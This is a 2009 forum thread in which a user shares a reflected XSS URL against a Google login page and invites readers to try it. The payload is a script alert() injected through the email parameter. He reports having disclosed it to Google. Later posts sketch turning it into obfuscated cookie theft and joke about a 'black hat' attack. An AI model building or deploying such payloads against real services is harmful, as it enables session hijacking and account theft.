i hacked GOOGLE!

Discussion in 'Ethical hacking' started by indiansword, Apr 21, 2009.

  1. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    I gave this title just to get more views to it, i have found another XSS vulnerability in google login pages. Have a look at it before it gets fixed, i have pasted the code below, which you will need to run into your address bar and have fun!

    Code:
    https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Indian%20Sword%27)%3C%2Fscript%3E&uls=Valider
    P.S.:- I've already reported it to google, so it'd be fixed soon.
     
    shabbir likes this.
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    What will happen when we paste the above code.
     
  3. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    lol, r u dbouting me?

    i aint gonna steal nothing, if u still dbout then clear your cookies and then check

    it will create another MANUAL box in GMAILS main page, as u see it is NOT some PHISHING SH81, because the address starts with "google.com"
     
  4. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    No. Just wanted to know the output. I know its Google.com domain l0l
     
  5. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    746
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
    DUDE!! You are the fu**ing master! how did you come about this? great stuff...
     
  6. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    glad atleast someone liked it :P
     
  7. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Even I liked it but I wanted to even know what would be the output as well. Some repu your way
     
  8. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    You're talking about OUTPUT!?

    Right now i made another box below the login box just to make you guyz udnerstand. Now, i can just remove that box and make the gmail the way it usually looks, and at the end i can add a script to steal the cookies and that particular script i can use "charcode[]" and hex the script so no one would understand it.

    If you remember the XSS worm in orkut albums, ONLY orkut worm stole more than 45,000 ids just in about 5 hours. And this thing is ENTIRE GOOGLE including adsense,orkut,gmail etc. etc.

    yea 1 more thing,
    this vBulletin reputation system SUCKS!
     
    Last edited: Apr 22, 2009
    shabbir likes this.
  9. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Agreed that Google Accounts could be in trouble but I guess they should have fixed it by now but I still see its not.
     
  10. SpOonWiZaRd

    SpOonWiZaRd Know what you can do.

    Joined:
    May 30, 2007
    Messages:
    746
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Network Engineer/Programmer
    Location:
    South Africa
    I see that indiansword likes XSS alot....
     
  11. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    lol i love it. Because:

    sql injection, shells everything else is just a certain way to be followed u know..., if u get a vulnerabale site then you follow the STANDARD STEPS.

    XSS is something, which totally depends on ur skills and imagination. YOU have to work on it to MAKE a website vulnerable.

    So i like it because, its you who makes the site vulnerable. unlike others where PRE-KNOWN vuln. sites are hacked.
     
  12. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    i think that google SO CALLED engineers arent working on it because no serious hack has been executed so far. Now, the BLACK HAT guy inside me is encouraging me to do something wrong LOL. i have work offs on friday and saturday, probably i wud do something which will get their attention to it :)
     
  13. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    Update:
    Just received an Email from "Google Team". saying "thanks, we're working on it".
     
  14. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Thats great :D
     
  15. fourthdimension

    fourthdimension New Member

    Joined:
    Jan 8, 2009
    Messages:
    144
    Likes Received:
    11
    Trophy Points:
    0
    Home Page:
    http://www.easygeek.org
    lol that's it? After all the frustration they caused you for not appreciating your help and not getting back to you in a timely manner, they just say "thanks, we're working on it"? lol
     
  16. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    He at least got the reply and there are 100s or 1000s of them waiting for a reply from Google these days
     
  17. idris0071

    idris0071 New Member

    Joined:
    Apr 23, 2009
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
  18. P455w0rd_Cr4kz

    P455w0rd_Cr4kz Member

    Joined:
    Jan 12, 2007
    Messages:
    198
    Likes Received:
    12
    Trophy Points:
    18
    Location:
    H3LL
    Home Page:
    http://amishrakefight.org
    indiansword, congratulations on that great find my friend. XSS vulnerable site are more common than people think. Even tho it should be fixed by now it reaffirms what i always said....there is lots of talented people in this forum,and i include our admin Shabbir.
    Props to you and my respect.
     
  19. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    Thanks. appericate it! :smug:
     
  20. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Ohh thanks but I am not an expert in this to be honest.
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice